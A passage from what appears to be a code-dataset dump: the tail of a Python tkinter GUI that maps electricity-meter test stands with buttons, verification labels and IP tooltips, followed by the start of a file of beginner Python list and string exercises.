Label(lbl_CL3005_3, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_3.place(x=45, y=30)\nCL3005_3_1 = Button(lbl_CL3005_3, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3035', '20'), bg = alarm_color[0])\nCL3005_3_1.place(x=40, y=0)\nCL3005_3_2 = Button(lbl_CL3005_3, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3035', '20'), bg = alarm_color[0])\nCL3005_3_2.place(x=135, y=0)\nCL3005_3_ST = Button(lbl_CL3005_3, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3035', '20'), bg = alarm_color[0])\nCL3005_3_ST.place(x=0, y=0)\nCL3005_3_PC = Button(lbl_CL3005_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC20','3035', '20'), bg = alarm_color[3])\nCL3005_3_PC.place(x=0, y=30)\nHovertip(CL3005_3_1, ['CL3005-24', ' SN3035'])\nHovertip(CL3005_3_2, ['CL3005-24', ' SN3035'])\nHovertip(CL3005_3_ST, ['CL3005-24', ' SN3035'])\nHovertip(CL3005_3_PC, ['Windows 7', 'IP 192.168.0.14'])\n\n# Stand No. 21 elements: CL3005-24 SN3036\nalarm_color = button_color('3036', 'PC21')\nlbl_CL3005_4 = LabelFrame(window, text = \"21 CL_3ф\")\nlbl_CL3005_4.place(x = 570, y=460, width = 250, height = 90)\npoverka_CL3005_4 = Label(lbl_CL3005_4, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_4.place(x=10, y=10)\nCL3005_4_1 = Button(lbl_CL3005_4, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3036', '21'), bg = alarm_color[0])\nCL3005_4_1.place(x=0, y=30)\nCL3005_4_2 = Button(lbl_CL3005_4, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3036', '21'), bg = alarm_color[0])\nCL3005_4_2.place(x=95, y=30)\nCL3005_4_ST = Button(lbl_CL3005_4, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3036', '21'), bg = alarm_color[0])\nCL3005_4_ST.place(x=190, y=30)\nCL3005_4_PC = Button(lbl_CL3005_4, text=\"ПК\", width = 3, command = lambda: PC_card('PC21','3036', '21'), bg = alarm_color[3])\nCL3005_4_PC.place(x=190, y=0)\nHovertip(CL3005_4_1, ['CL3005-24', ' SN3036'])\nHovertip(CL3005_4_2, 
['CL3005-24', ' SN3036'])\nHovertip(CL3005_4_ST, ['CL3005-24', ' SN3036'])\nHovertip(CL3005_4_PC, ['Windows 7', 'IP 192.168.0.13'])\n\n# Stand No. 22 elements: CL3005-24 SN3032\nalarm_color = button_color('3032', 'PC22')\nlbl_CL3005_5 = LabelFrame(window, text = \"22 CL_3ф\")\nlbl_CL3005_5.place(x = 500, y=550, width = 250, height = 90)\npoverka_CL3005_5 = Label(lbl_CL3005_5, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_5.place(x=45, y=30)\nCL3005_5_1 = Button(lbl_CL3005_5, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3032', '22'), bg = alarm_color[0])\nCL3005_5_1.place(x=50, y=0)\nCL3005_5_2 = Button(lbl_CL3005_5, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3032', '22'), bg = alarm_color[0])\nCL3005_5_2.place(x=145, y=0)\nCL3005_5_ST = Button(lbl_CL3005_5, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3032', '22'), bg = alarm_color[0])\nCL3005_5_ST.place(x=10, y=0)\nCL3005_5_PC = Button(lbl_CL3005_5, text=\"ПК\", width = 3, command = lambda: PC_card('PC22','3032', '22'), bg = alarm_color[3])\nCL3005_5_PC.place(x=10, y=30)\nHovertip(CL3005_5_1, ['CL3005-24', ' SN3032'])\nHovertip(CL3005_5_2, ['CL3005-24', ' SN3032'])\nHovertip(CL3005_5_ST, ['CL3005-24', ' SN3032'])\nHovertip(CL3005_5_PC, ['Windows XP', 'IP 192.168.0.200'])\n\n# Stand No. 23 elements: CL1001-24 SN1015\nalarm_color = button_color('1015', 'PC23')\nlbl_CL1001_2 = LabelFrame(window, text = \"23 CL_1ф\")\nlbl_CL1001_2.place(x = 480, y=640, width = 220, height = 70)\npoverka_CL1001_2 = Label(lbl_CL1001_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1001_2.place(x=10, y=25)\nCL1001_3_1 = Button(lbl_CL1001_2, text=\"1-12\", width = 6, command = lambda: installation_card('CL1001','1015', '23'), bg = alarm_color[0])\nCL1001_3_1.place(x=90, y=0)\nCL1001_3_2 = Button(lbl_CL1001_2, text=\"13-24\", width = 6, command = lambda: installation_card('CL1001','1015', '23'), bg = alarm_color[0])\nCL1001_3_2.place(x=150, y=0)\nCL1001_3_ST = Button(lbl_CL1001_2, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1015', '23'), bg = alarm_color[0])\nCL1001_3_ST.place(x=10, y=0)\nCL1001_3_PC = Button(lbl_CL1001_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC23','1015', '23'), bg = alarm_color[3])\nCL1001_3_PC.place(x=50, y=0)\nHovertip(CL1001_3_1, ['CL1001-24', ' SN1015'])\nHovertip(CL1001_3_2, ['CL1001-24', ' SN1015'])\nHovertip(CL1001_3_ST, ['CL1001-24', ' SN1015'])\nHovertip(CL1001_3_PC, ['Windows 7', 'IP 192.168.0.100'])\n\n# Stand No. 24 elements: CL1005-48 SN1012\nalarm_color = button_color('1012', 'PC24')\nlbl_CL1005_1 = LabelFrame(window, text = \"24 CL_1ф\")\nlbl_CL1005_1.place(x = 480, y=710, width = 220, height = 70)\npoverka_CL1005_1 = Label(lbl_CL1005_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1005_1.place(x=110, y=-5)\nCL1005_1_1 = Button(lbl_CL1005_1, text=\"1-24\", width = 6, command = lambda: installation_card('CL1001','1012', '24'), bg = alarm_color[0])\nCL1005_1_1.place(x=110, y=15)\nCL1005_1_2 = Button(lbl_CL1005_1, text=\"25-48\", width = 6, command = lambda: installation_card('CL1001','1012', '24'), bg = alarm_color[0])\nCL1005_1_2.place(x=10, y=15)\nCL1005_1_ST = Button(lbl_CL1005_1, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1001','1012', '24'), bg = alarm_color[0])\nCL1005_1_ST.place(x=170, y=15)\nCL1005_1_PC = Button(lbl_CL1005_1, text=\"ПК\", width = 3, command = lambda: 
PC_card('PC24','1012', '24'), bg = alarm_color[3])\nCL1005_1_PC.place(x=70, y=15)\nHovertip(CL1005_1_1, ['CL1005-48', ' SN1012'])\nHovertip(CL1005_1_2, ['CL1005-48', ' SN1012'])\nHovertip(CL1005_1_ST, ['CL1005-48', ' SN1012'])\nHovertip(CL1005_1_PC, ['Windows XP', 'IP 192.168.0.245'])\n\n# Stand No. 25 elements: CL3005-24 SN3044\nalarm_color = button_color('3044', 'PC25')\nlbl_CL3005_6 = LabelFrame(window, text = \"25 CL_3ф\")\nlbl_CL3005_6.place(x = 820, y=0, width = 250, height = 90)\npoverka_CL3005_6 = Label(lbl_CL3005_6, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_6.place(x=45, y=30)\nCL3005_6_1 = Button(lbl_CL3005_6, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3044', '25'), bg = alarm_color[0])\nCL3005_6_1.place(x=40, y=0)\nCL3005_6_2 = Button(lbl_CL3005_6, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3044', '25'), bg = alarm_color[0])\nCL3005_6_2.place(x=135, y=0)\nCL3005_6_ST = Button(lbl_CL3005_6, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3044', '25'), bg = alarm_color[0])\nCL3005_6_ST.place(x=0, y=0)\nCL3005_6_PC = Button(lbl_CL3005_6, text=\"ПК\", width = 3, command = lambda: PC_card('PC25','3044', '25'), bg = alarm_color[3])\nCL3005_6_PC.place(x=0, y=30)\nHovertip(CL3005_6_1, ['CL3005-24', ' SN3044'])\nHovertip(CL3005_6_2, ['CL3005-24', ' SN3044'])\nHovertip(CL3005_6_ST, ['CL3005-24', ' SN3044'])\nHovertip(CL3005_6_PC, ['Windows 7', 'IP 192.168.0.247'])\n\n# Stand No. 26 elements: SY8126 SN704202\nalarm_color = button_color('704202', 'PC26')\nlbl_SY8126_1 = LabelFrame(window, text = \"26 SY_3ф\")\nlbl_SY8126_1.place(x = 970, y=190, width = 250, height = 90)\npoverka_SY8126_1 = Label(lbl_SY8126_1, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_1.place(x=45, y=30)\nSY8126_1_1 = Button(lbl_SY8126_1, text=\"1-12\", width = 10, command = lambda: installation_card('SY8126','704202', '26'), bg = alarm_color[0])\nSY8126_1_1.place(x=50, y=0)\nSY8126_1_2 = Button(lbl_SY8126_1, text=\"13-24\", width = 10, command = lambda: installation_card('SY8126','704202', '26'), bg = alarm_color[0])\nSY8126_1_2.place(x=145, y=0)\nSY8126_1_ST = Button(lbl_SY8126_1, text=\"Уст.\", width = 3, command = lambda: installation_card('SY8126','704202', '26'), bg = alarm_color[0])\nSY8126_1_ST.place(x=10, y=0)\nSY8126_1_PC = Button(lbl_SY8126_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC26','704202', '26'), bg = alarm_color[3])\nSY8126_1_PC.place(x=10, y=30)\nHovertip(SY8126_1_1, ['SY8126', ' SN704202'])\nHovertip(SY8126_1_2, ['SY8126', ' SN704202'])\nHovertip(SY8126_1_ST, ['SY8126', ' SN704202'])\nHovertip(SY8126_1_PC, ['Windows XP', 'IP 192.168.0.18'])\n\n# Stand No. 27 elements: SY8126 SN704203\nalarm_color = button_color('704203', 'PC27')\nlbl_SY8126_2 = LabelFrame(window, text = \"27 SY_3ф\")\nlbl_SY8126_2.place(x = 970, y=280, width = 250, height = 90)\npoverka_SY8126_2 = Label(lbl_SY8126_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_2.place(x=10, y=10)\nSY8126_2_1 = Button(lbl_SY8126_2, text=\"1-12\", width = 10, command = lambda: installation_card('SY8126','704203', '27'), bg = alarm_color[0])\nSY8126_2_1.place(x=10, y=30)\nSY8126_2_2 = Button(lbl_SY8126_2, text=\"13-24\", width = 10, command = lambda: installation_card('SY8126','704203', '27'), bg = alarm_color[0])\nSY8126_2_2.place(x=105, y=30)\nSY8126_2_ST = Button(lbl_SY8126_2, text=\"Уст.\", width = 3, command = lambda: 
installation_card('SY8126','704203', '27'), bg = alarm_color[0])\nSY8126_2_ST.place(x=200, y=30)\nSY8126_2_PC = Button(lbl_SY8126_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC27','704203', '27'), bg = alarm_color[3])\nSY8126_2_PC.place(x=200, y=0)\nHovertip(SY8126_2_1, ['SY8126', ' SN704203'])\nHovertip(SY8126_2_2, ['SY8126', ' SN704203'])\nHovertip(SY8126_2_ST, ['SY8126', ' SN704203'])\nHovertip(SY8126_2_PC, ['Windows XP', 'IP 192.168.0.16'])\n\n# Stand No. 28 elements: CL3005 SN3038\nalarm_color = button_color('3038', 'PC28')\nlbl_SY8126_3 = LabelFrame(window, text = \"28 CL_3ф\")\nlbl_SY8126_3.place(x = 970, y=370, width = 250, height = 90)\npoverka_SY8126_3 = Label(lbl_SY8126_3, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_3.place(x=45, y=30)\nSY8126_3_1 = Button(lbl_SY8126_3, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005','3038', '28'), bg = alarm_color[0])\nSY8126_3_1.place(x=50, y=0)\nSY8126_3_2 = Button(lbl_SY8126_3, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005','3038', '28'), bg = alarm_color[0])\nSY8126_3_2.place(x=145, y=0)\nSY8126_3_ST = Button(lbl_SY8126_3, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005','3038', '28'), bg = alarm_color[0])\nSY8126_3_ST.place(x=10, y=0)\nSY8126_3_PC = Button(lbl_SY8126_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC28','3038', '28'), bg = alarm_color[3])\nSY8126_3_PC.place(x=10, y=30)\nHovertip(SY8126_3_1, ['CL3005', ' SN3038'])\nHovertip(SY8126_3_2, ['CL3005', ' SN3038'])\nHovertip(SY8126_3_ST, ['CL3005', ' SN3038'])\nHovertip(SY8126_3_PC, ['Windows XP', 'IP 192.168.0.101'])\n\n# Stand No. 29 elements: SY8126 SN704204\nalarm_color = button_color('704204', 'PC29')\nlbl_SY8126_2 = LabelFrame(window, text = \"29 SY_3ф\")\nlbl_SY8126_2.place(x = 970, y=460, width = 250, height = 90)\npoverka_SY8126_2 = Label(lbl_SY8126_2, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_2.place(x=10, y=10)\nSY8126_2_1 = Button(lbl_SY8126_2, text=\"1-12\", width = 10, command = lambda: installation_card('SY8126','704204', '29'), bg = alarm_color[0])\nSY8126_2_1.place(x=10, y=30)\nSY8126_2_2 = Button(lbl_SY8126_2, text=\"13-24\", width = 10, command = lambda: installation_card('SY8126','704204', '29'), bg = alarm_color[0])\nSY8126_2_2.place(x=105, y=30)\nSY8126_2_ST = Button(lbl_SY8126_2, text=\"Уст.\", width = 3, command = lambda: installation_card('SY8126','704204', '29'), bg = alarm_color[0])\nSY8126_2_ST.place(x=200, y=30)\nSY8126_2_PC = Button(lbl_SY8126_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC29','704204', '29'), bg = alarm_color[3])\nSY8126_2_PC.place(x=200, y=0)\nHovertip(SY8126_2_1, ['SY8126', ' SN704204'])\nHovertip(SY8126_2_2, ['SY8126', ' SN704204'])\nHovertip(SY8126_2_ST, ['SY8126', ' SN704204'])\nHovertip(SY8126_2_PC, ['Windows 10', 'нет данных'])\n\n# Stand No. 30 elements: CL3005-24 SN3030\nalarm_color = button_color('3030', 'PC30')\nlbl_CL3005_7 = LabelFrame(window, text = \"30 CL_3ф\")\nlbl_CL3005_7.place(x = 970, y=550, width = 250, height = 90)\npoverka_CL3005_7 = Label(lbl_CL3005_7, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_7.place(x=45, y=30)\nCL3005_7_1 = Button(lbl_CL3005_7, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3030', '30'), bg = alarm_color[0])\nCL3005_7_1.place(x=50, y=0)\nCL3005_7_2 = Button(lbl_CL3005_7, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3030', 
'30'), bg = alarm_color[0])\nCL3005_7_2.place(x=145, y=0)\nCL3005_7_ST = Button(lbl_CL3005_7, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3030', '30'), bg = alarm_color[0])\nCL3005_7_ST.place(x=10, y=0)\nCL3005_7_PC = Button(lbl_CL3005_7, text=\"ПК\", width = 3, command = lambda: PC_card('PC30','3030', '30'), bg = alarm_color[3])\nCL3005_7_PC.place(x=10, y=30)\nHovertip(CL3005_7_1, ['CL3005-24', ' SN3030'])\nHovertip(CL3005_7_2, ['CL3005-24', ' SN3030'])\nHovertip(CL3005_7_ST, ['CL3005-24', ' SN3030'])\nHovertip(CL3005_7_PC, ['Windows 7', 'IP 192.168.0.180'])\n\n# Stand No. 31 elements: CL3005-24 SN3029\nalarm_color = button_color('3029', 'PC31')\nlbl_CL3005_8 = LabelFrame(window, text = \"31 CL_3ф\")\nlbl_CL3005_8.place(x = 970, y=640, width = 250, height = 90)\npoverka_CL3005_8 = Label(lbl_CL3005_8, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_8.place(x=10, y=10)\nCL3005_8_1 = Button(lbl_CL3005_8, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3029', '31'), bg = alarm_color[0])\nCL3005_8_1.place(x=10, y=30)\nCL3005_8_2 = Button(lbl_CL3005_8, text=\"13-24\", width = 10, command = lambda: installation_card('CL3005-24','3029', '31'), bg = alarm_color[0])\nCL3005_8_2.place(x=105, y=30)\nCL3005_8_ST = Button(lbl_CL3005_8, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3029', '31'), bg = alarm_color[0])\nCL3005_8_ST.place(x=200, y=30)\nCL3005_8_PC = Button(lbl_CL3005_8, text=\"ПК\", width = 3, command = lambda: PC_card('PC31','3029', '31'), bg = alarm_color[3])\nCL3005_8_PC.place(x=200, y=0)\nHovertip(CL3005_8_1, ['CL3005-24', ' SN3029'])\nHovertip(CL3005_8_2, ['CL3005-24', ' SN3029'])\nHovertip(CL3005_8_ST, ['CL3005-24', ' SN3029'])\nHovertip(CL3005_8_PC, ['Windows 7', 'IP 192.168.0.111'])\n\n# Stand No. 32 elements: Merkury_210 SN025\nalarm_color = button_color('025', 'PC32')\nlbl_Merkury_210 = LabelFrame(window, text = \"32\")\nlbl_Merkury_210.place(x = 710, y=720, width = 60, height = 60)\nMerkury_210 = Button(lbl_Merkury_210, text=\"1-6\", width = 3, command = lambda: installation_card('Merkury_210','025', '32'), bg = alarm_color[0])\nMerkury_210.place(x=10, y=0)\nHovertip(Merkury_210, ['Merkury_210', 'SN025'])\n\n# Stand No. 33 elements: Merkury_210 SN018\nalarm_color = button_color('018', 'PC33')\nlbl_Merkury_210 = LabelFrame(window, text = \"33\")\nlbl_Merkury_210.place(x = 780, y=720, width = 60, height = 60)\nMerkury_210 = Button(lbl_Merkury_210, text=\"1-6\", width = 3, command = lambda: installation_card('Merkury_210','018', '33'), bg = alarm_color[0])\nMerkury_210.place(x=10, y=0)\nHovertip(Merkury_210, ['Merkury_210', 'SN018'])\n\n# Stand No. 34 elements: Functional_3ph SN000001\nalarm_color = button_color('000001', 'PC34')\nlbl_Functional_3ph_1 = LabelFrame(window, text = \"34\")\nlbl_Functional_3ph_1.place(x = 130, y=640, width = 90, height = 60)\nFunctional_3ph_1 = Button(lbl_Functional_3ph_1, text=\"1\", width = 3, command = lambda: installation_card('Functional_3ph', '000001', '34'), bg = alarm_color[0])\nFunctional_3ph_1.place(x=10, y=0)\nFunctional_3ph_PC_1 = Button(lbl_Functional_3ph_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC34', '000001', '34'), bg = alarm_color[3])\nFunctional_3ph_PC_1.place(x=50, y=0)\nHovertip(Functional_3ph_1, ['Functional_3ph', '000001'])\nHovertip(Functional_3ph_PC_1, ['Windows 7', 'IP 192.168.194.19'])\n\n# Stand No. 35 elements: Functional_3ph SN000035\nalarm_color = button_color('000035', 'PC35')\nlbl_Functional_3ph_2 = 
LabelFrame(window, text = \"35\")\nlbl_Functional_3ph_2.place(x = 20, y=640, width = 90, height = 60)\nFunctional_3ph_2 = Button(lbl_Functional_3ph_2, text=\"1\", width = 3, command = lambda: installation_card('Functional_3ph','000035', '35'), bg = alarm_color[0])\nFunctional_3ph_2.place(x=10, y=0)\nFunctional_3ph_PC_2 = Button(lbl_Functional_3ph_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC35','000035', '35'), bg = alarm_color[3])\nFunctional_3ph_PC_2.place(x=50, y=0)\nHovertip(Functional_3ph_2, ['Functional_3ph', '000035'])\nHovertip(Functional_3ph_PC_2, ['Windows 7', 'IP 000.000.000.000'])\n\n# Stand No. 36 elements: Functional_1ph SN061101401\nalarm_color = button_color('061101401', 'PC36')\nlbl_Functional_1ph_1 = LabelFrame(window, text = \"36\")\nlbl_Functional_1ph_1.place(x = 130, y=700, width = 90, height = 60)\nFunctional_1ph_1 = Button(lbl_Functional_1ph_1, text=\"1\", width = 3, command = lambda: installation_card('Functional_1ph','061101401', '36'), bg = alarm_color[0])\nFunctional_1ph_PC_3 = Button(lbl_Functional_1ph_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC36','061101401', '36'), bg = alarm_color[3])\nFunctional_1ph_PC_3.place(x=50, y=0)\nFunctional_1ph_1.place(x=10, y=0)\nHovertip(Functional_1ph_1, ['Functional_1ph', '061101401'])\nHovertip(Functional_1ph_PC_3, ['Windows 7', 'IP 0.0.0.0'])\n\n# Stand No. 37 elements: Functional_1ph SN000037\nalarm_color = button_color('000037', 'PC37')\nlbl_Functional_1ph_2 = LabelFrame(window, text = \"37\")\nlbl_Functional_1ph_2.place(x = 20, y=700, width = 90, height = 60)\nFunctional_1ph_2 = Button(lbl_Functional_1ph_2, text=\"1\", width = 3, command = lambda: installation_card('Functional_1ph','000037', '37'), bg = alarm_color[0])\nFunctional_1ph_2.place(x=10, y=0)\nFunctional_1ph_2_PC_4 = Button(lbl_Functional_1ph_2, text=\"ПК\", width = 3, command = lambda: PC_card('PC37','000037', '37'), bg = alarm_color[3])\nFunctional_1ph_2_PC_4.place(x=50, y=0)\nHovertip(Functional_1ph_2, ['Functional_1ph', '000037'])\nHovertip(Functional_1ph_2_PC_4, ['Windows 7', 'IP 000.000.000.000'])\n\n# Stand No. 38 elements: Functional_1ph SN000038\nalarm_color = button_color('000038', 'PC38')\nlbl_Functional_1ph_1 = LabelFrame(window, text = \"38\")\nlbl_Functional_1ph_1.place(x = 1130, y=730, width = 90, height = 60)\nFunctional_1ph_1 = Button(lbl_Functional_1ph_1, text=\"1\", width = 3, command = lambda: installation_card('Functional_1ph','000038', '38'), bg = alarm_color[0])\nFunctional_1ph_PC_3 = Button(lbl_Functional_1ph_1, text=\"ПК\", width = 3, command = lambda: PC_card('PC38','000038', '38'), bg = alarm_color[3])\nFunctional_1ph_PC_3.place(x=5, y=0)\nFunctional_1ph_1.place(x=45, y=0)\nHovertip(Functional_1ph_1, ['Functional_1ph', '000038'])\nHovertip(Functional_1ph_PC_3, ['Windows XP', 'IP 192.168.0.243'])\n\n\n# Stand No. 39 elements: Rele_201TLO SN000039\nalarm_color = button_color('000039', 'PC39')\nlbl_Rele_201TLO = LabelFrame(window, text = \"39, 40\")\nlbl_Rele_201TLO.place(x = 20, y=10, width = 150, height = 60)\nRele_201TLO = Button(lbl_Rele_201TLO, text=\"1\", width = 3, command = lambda: installation_card('Rele_201TLO','000039', '39'), bg = alarm_color[0])\nRele_201TLO.place(x=50, y=0)\nRele_201TLO_PC = Button(lbl_Rele_201TLO, text=\"ПК\", width = 3, command = lambda: PC_card('PC39','000039', '39'), bg = alarm_color[3])\nRele_201TLO_PC.place(x=10, y=0)\nHovertip(Rele_201TLO, ['Rele_201TLO', '000039'])\nHovertip(Rele_201TLO_PC, ['Windows XP', 'IP 192.168.0.131'])\n\n# Stand No. 40 elements: Modem_PLC_201TLO SN000040\nalarm_color = 
button_color('000040', 'PC39')\nModem_201TLO = Button(lbl_Rele_201TLO, text=\"1\", width = 3, command = lambda: installation_card('Modem_201TLO','000040', '40'), bg = alarm_color[0])\nModem_201TLO.place(x=90, y=0)\nHovertip(Modem_201TLO, ['Modem_201TLO', '000040'])\n\n# Stand No. 41 elements: CL1000 SN1017\nalarm_color = button_color('1017', 'PC41')\nlbl_CL1000 = LabelFrame(window, text = \"41 CL_1ф\")\nlbl_CL1000.place(x = 410, y=500, width = 50, height = 180)\npoverka_CL1000 = Label(lbl_CL1000, text = (\"Пов.:\\n\" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL1000.place(x=5, y=110)\nCL1000_1 = Button(lbl_CL1000, text=\"1-6\", width = 3, command = lambda: installation_card('CL1000','1017', '41'), bg = alarm_color[0])\nCL1000_1.place(x=5, y=5)\nCL1000_ST = Button(lbl_CL1000, text=\"Уст.\", width = 3, command = lambda: installation_card('CL1000','1017', '41'), bg = alarm_color[0])\nCL1000_ST.place(x=5, y=40)\nCL1000_PC = Button(lbl_CL1000, text=\"ПК\", width = 3, command = lambda: PC_card('PC41','1017', '41'), bg = alarm_color[3])\nCL1000_PC.place(x=5, y=75)\nHovertip(CL1000_1, ['CL1000', '1017'])\nHovertip(CL1000_ST, ['CL1000', '1017'])\nHovertip(CL1000_PC, ['Windows 7', 'IP 192.168.0.207'])\n\n# Stand No. 49 elements: SY8126 SN0808169\nalarm_color = button_color('0808169', 'PC49')\nlbl_SY8126_3 = LabelFrame(window, text = \"49 SY_3ф\")\nlbl_SY8126_3.place(x = 1270, y=280, width = 100, height = 270)\npoverka_SY8126_3 = Label(lbl_SY8126_3, text = (\"Поверка: \\n\" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_SY8126_3.place(x=10, y=170)\nprogon_SY8126_3 = Label(lbl_SY8126_3, text = (\"Стенд рядом\\n с прогоном\" ))\nprogon_SY8126_3.place(x=0, y=210)\nSY8126_3_1 = Button(lbl_SY8126_3, text=\"1 \\n-12\", width = 3, height = 3, command = lambda: installation_card('SY8126','0808169', '49'), bg = alarm_color[0])\nSY8126_3_1.place(x=10, y=70)\nSY8126_3_2 = Button(lbl_SY8126_3, text=\"13 \\n-24\", width = 3, height = 3, command = lambda: installation_card('SY8126','0808169', '49'), bg = alarm_color[0])\nSY8126_3_2.place(x=10, y=5)\nSY8126_3_ST = Button(lbl_SY8126_3, text=\"Уст.\", width = 3, command = lambda: installation_card('SY8126','0808169', '49'), bg = alarm_color[0])\nSY8126_3_ST.place(x=10, y=135)\nSY8126_3_PC = Button(lbl_SY8126_3, text=\"ПК\", width = 3, command = lambda: PC_card('PC49','0808169', '49'), bg = alarm_color[3])\nSY8126_3_PC.place(x=45, y=135)\nHovertip(SY8126_3_1, ['SY8126', ' SN0808169'])\nHovertip(SY8126_3_2, ['SY8126', ' SN0808169'])\nHovertip(SY8126_3_ST, ['SY8126', ' SN0808169'])\nHovertip(SY8126_3_PC, ['Windows XP', 'IP 192.168.0.11'])\n\n# Stand No. 90 elements: CL3005-24 SN3027\nalarm_color = button_color('3027', 'PC90')\nlbl_CL3005_9 = LabelFrame(window, text = \"90 Ремонт_группа\")\nlbl_CL3005_9.place(x = 1250, y=700, width = 150, height = 90)\npoverka_CL3005_9 = Label(lbl_CL3005_9, text = (\"Поверка: \" + str(alarm_color[1])) , fg = alarm_color[2])\npoverka_CL3005_9.place(x=0, y=10)\nCL3005_9_1 = Button(lbl_CL3005_9, text=\"1-12\", width = 10, command = lambda: installation_card('CL3005-24','3027', '90'), bg = alarm_color[0])\nCL3005_9_1.place(x=5, y=30)\nCL3005_9_ST = Button(lbl_CL3005_9, text=\"Уст.\", width = 3, command = lambda: installation_card('CL3005-24','3027', '90'), bg = alarm_color[0])\nCL3005_9_ST.place(x=110, y=30)\nCL3005_9_PC = Button(lbl_CL3005_9, text=\"ПК\", width = 3, command = lambda: PC_card('PC90','3027', '90'), bg = alarm_color[3])\nCL3005_9_PC.place(x=110, y=0)\nHovertip(CL3005_9_1, ['CL3005-24', ' SN3027'])\nHovertip(CL3005_9_ST, 
['CL3005-24', ' SN3027'])\nHovertip(CL3005_9_PC, ['Windows 2000', 'IP 0.0.0.0'])\n\nwindow.mainloop()\n\n\n","sub_path":"journal/journal01.py","file_name":"journal01.py","file_ext":"py","file_size_in_byte":63670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"106477129","text":"'''1. Function\nGiven three numbers a, b (a ≤ b) and step. Create a list of evenly spaced elements starting from a to b spaced by step. You have 3 arguments:\nInput Output\n1 5 1 [1, 2, 3, 4, 5]\n10 100 20 [10, 30, 50, 70, 90]'''\nu = []\nx = int(input('Start: '))\ny = int(input('End: '))\nz = int(input('Step: '))\nif x > y and z == abs(z):\n\tprint('Wrong numbers')\nelif x < y and z != abs(z):\n\tprint('Wrong numbers')\nelse:\n\tfor i in range(x, y + 1, z):\n\t\tu.append(i)\n\tprint(u)\n\n\n'''2. List\nWrite a function. Create the list whose elements are products of two neighbours.\nInput Output\n[3, 7, 12, 5, 20, 0] [21, 84, 60, 100, 0] [1, 1, 4, 32, 6] [1, 4, 128, 192 ]'''\nz = []\nx = [3, 7, 12, 5, 20, 0]\nfor i in range(len(x)-1):\n\tres = x[i] * x[i + 1]\n\tz.append(res)\nprint(z)\n\n\n'''3. New sentence\nGiven a sentence with missing words and an array of words. Replace all ‘_’ in the sentence with the words from the array.\nInput “_, we have a _.”\n[“Ashot”, “problem”]\nOutput: “Ashot, we have a problem.”'''\na = ['Ashot', 'problem']\ncount = 0\nu = []\n\nz = '_, we have a _.'\nfor i in z:\n\tif i == '_':\n\t\tu.append(a[count])\n\t\tcount += 1\n\telse:\n\t\tu.append(i)\nprint(''.join(u))\n\n\n'''4. sum word\nGiven a list of strings. Find the strings with maximum and minimum lengths in the array. Print the sum of their lengths.\nInput: [“anymore”, “raven”, “me”, “communicate”] Output: 13'''\n\nx = ['anymore', 'raven', 'me', 'communicate']\ncount_max = 0\ncount_min = 0\nfor i in x:\n\tif len(i) > count_max:\n\t\tcount_max = len(i)\n\t\tcount_min = len(i)\nfor i in x:\n\tif count_min > len(i):\n\t\tcount_min = len(i)\nres = count_min + count_max\nprint(res)\n\n\n\n'''5. find index\nGiven a list of numbers and a number. Find the index of the first element which is equal to that number. If there is no such number, then find the index of the first element which is the closest to it. Input Output\n[21, -9, 15, 2116, -71, 33], -71 4\n[ 36, -12, 47, -58, 148, -55, -19, 10], -56 5'''\nu = []\nx = [21, -9, 15, 2116, -71, 33]\ny = int(input('Number: '))\nif y in x:\n\tz = x.index(y)\n\tprint(z)\nelse:\n\tfor i in x:\n\t\tu.append(abs(i - y))\n\ta = u.index(min(u))\n\tprint(a)\n\n\n'''6. New Dict\nDefine a function which can generate a dictionary where the keys are numbers between 1 and N (both included) and the values are squares of the keys. The function should print the 